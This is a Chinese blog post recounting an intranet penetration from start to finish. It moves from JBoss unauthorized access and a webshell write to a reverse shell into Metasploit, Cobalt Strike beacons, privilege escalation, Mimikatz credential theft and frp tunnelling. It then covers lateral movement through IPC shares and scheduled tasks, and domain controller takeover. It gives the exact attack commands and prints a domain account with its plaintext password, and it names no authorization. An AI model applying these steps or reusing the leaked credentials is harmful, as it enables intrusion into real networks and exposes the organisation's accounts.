一次内网实战记录

公网JBoss getshell

JBoss未授权访问,进入JBoss管理控制台可以通过加载远程的war来部署木马。

可以手工写入webshell,但是我使用手测出报错。
一次内网实战记录

可以使用下面的exp,jexboss还是非常好用的,可以反弹msf,也可以代理模式运行。

https://github.com/joaomatosf/jexboss.git

一次内网实战记录

通过jexboss成功执行getshell,但是这里想要能够进行文件上传等操作,所以还是需要一个webshell。可以使用echo命令将webshell写到jboss的web目录下。可以从jmx控制台找到这个web目录。

一次内网实战记录

echo [写入的内容] >> C:/Portals/JBoss/jboss-6.1.0.Final/common/deploy/jmx-console.war/1.jsp

注意:

echo命令如果遇到特殊符号如< 、>需要在其前面加一个^表示转义。

有未授权的jboss版本较低,相对应的java版本也可能较低,尽量使用哥斯拉的jsp一句话木马。冰蝎木马在实测中可能会无法运行。

测试过程中,使用jexboss执行命令之后,文件一直都访问不到。所幸jexboss提供反弹shell给msf的功能。

msf设置好监听,在jexboss提供的shell中输入如下命令即可。

jexremote=ip:port
一次内网实战记录

在msf的shell中写入文件成功,添加到哥斯拉。

一次内网实战记录
淦,虽然哥斯拉连上了webshell,执行命令却返回一堆乱码,不过好在还有msf的shell在。

一次内网实战记录

查看系统的相关信息

whoami mysql\mysql
systeminfo windows7 x64
tasklist 查看进程在线杀软对比一下,这台机器没有杀软

ok了解到上面的相关信息后,就可以进行cs上线了。虽说没有杀软还是小做了一下免杀哈。哥斯拉文件上传配合msf执行,成功CS上线,现在算是进入内网了。
一次内网实战记录

域渗透
本机提权

在CS上线后,在这里做的第一件事情是提权。低权限级别可能在后续的一些测试中受到限制,所以需要尽可能的提权。

当前上线的用户为mysql\mysql,这个用户是在本地管理员组的,其实权限已经很大了,但是还是希望可以提权到SYSTEM级别。

这里通过派生会话给MSF,使用getsystem提权成功。

一次内网实战记录

再通过MSF执行之前上传的CS木马,即可system上线。当然提权成不成功也不要紧,我们还可以以此服务器攻击其他服务机器。

一次内网实战记录

内网信息收集

有了第一台内网机器的权限后,下一步就是很关键的信息收集。

首先要查看当前机器的系统信息、本机的网络环境、收集域内的相关信息,包括所有的计算机、以及一些组信息,下面列出了一些常用的命令和作用。当然也可以借助CS插件和一些工具对内网进行扫描来收集信息,例如fscan、cs插件巨龙拉冬。

ipconfig、systeminfo、
net view /domain 查看有几个域
net user /domain 查看域用户
net view /domain[:domain_name] 查询指定域内的机器
net group /domain 查询域里的组
net group “group_name” /domain 查询域内指定组的用户
eg:net group “domain admins” 查询域管理员
net group "domain computers"查询域内所有主机名
(这里的组名和操作系统语言有关系)

内网中有几个域
一次内网实战记录

查询INTEGRAL域内主机,这里我们已经看到了机器名为INTAD的机器,应该就是域控了。

一次内网实战记录

查询内网主机名和扫描内网存活主机

同时这台机器是windows7的机器,并且没打补丁,所以可以使用mimikatz抓取明文密码。
一次内网实战记录

但是由于这台机器位于工作组内,接下来的首要目标还是移动到域内的机器上。
一次内网实战记录

内网移动
206

通过对内网的探测,发现192.168.0.206也是一台MySQL服务,同时再206上面也开开了JBoss服务,不过只能内网访问。先不管三七二十一,因为存在Jboss原因可以使用相同的方法上线206这台机器。

一次内网实战记录

使用frp搭建内网穿透,上面也介绍过我们的Jexboss.py这个exp是支持代理的,只需要运行命令后面加上参数-P和代理URL即可。很快就拿到了内网第二台机器,这台机器的用户也为MySQL,同时权限也是仅是本地管理员的权限,同样也不在域内。。。还是先提权吧。

使用ms14-058成功提权到SYSTEM级别,同样的windows7系统,使用mimikiatz抓取明文密码。这里使用MySQL权限抓不到密码,在提权后抓到了明文密码。(能提权还是尽可能提权)

一次内网实战记录

这里抓到了域用户的账号和密码。还是挺惊喜的。结合后面的ip判断,应该可以使用该账户登录到192.168.0.10这台机器。

这里尝试了使用ipc文件共享来传CS后门,并使用计划任务来完成CS上线

//建立ipc连接
net use \MSUKHAREV2\C$ /u:integral\dlyalin 1990IntegraL1990
//将CS后门复制到.10这台机器的共享路径
copy c:\Inbox\ctest.exe \MSUKHAREV2\C$
//查看目标当前时间
net time \MSUKHAREV2
//使用schtasks为远程计算机添加计划任务,执行Cs后门上线
schtasks /Create /SC ONCE /ST 14:13 /TN pos /TR c:\ctest.exe /S 192.168.0.10 /u integral\dlyalin /p 1990IntegraL1990

域内机器上线成功,,下面收集域内信息
一次内网实战记录

查询域内组信息
一次内网实战记录

查询域控制组的成员,此时发现这里用户integral\dlyalin就是域控组的成员。。。阿这。
一次内网实战记录

域控getshell

前面收集信息时,已经得知域控的电脑名为INTAD,查找域控的方法也很多了,可以用nslookup查一下DNS服务区,一般DNS部署在域控上。这里直接ping一下这个名字就可以获得ip。

再次使用IPC来上传CS后门,并设置定时任务上线CS。

不过这里似乎有一些设备限制域控机器的外连,还没有执行命令就已经连不上了。这里需要使用内网上线的机器转发一个监听,再生成后门上传到域控即可上线。

上线之后可以使用CS的svc-exe来提权,即可获得sytstem级别权限。

拿到域控的权限,接下来可以直接dump域内所有用户的hash了,此时就可以畅游内网了。(偷笑)

总结

这次内网实战,首先是拿到了一台可以外网访问到的JBOSS机器进入内网;之后通过内网存在的Web应用(JBOSS)横向移动第二台机器中;在机器二中获得了域内一账号的明文密码和相应的机器IP(其实这时获得的是内网域控的账号密码他能登录域内的机器,只是当时没想到居然是域管理员的账号密码);通过这个账号密码使用IPC入侵,上线了第三台机器;最后登录到域控机器通过提权获得了integral.local域控权限。

感谢观看!!给个关注就更好了~

上一篇:用友t+报表之CS开发


下一篇:《java数据结构与算法》笔记-CH4-8栈结构实现后缀表达式计算结果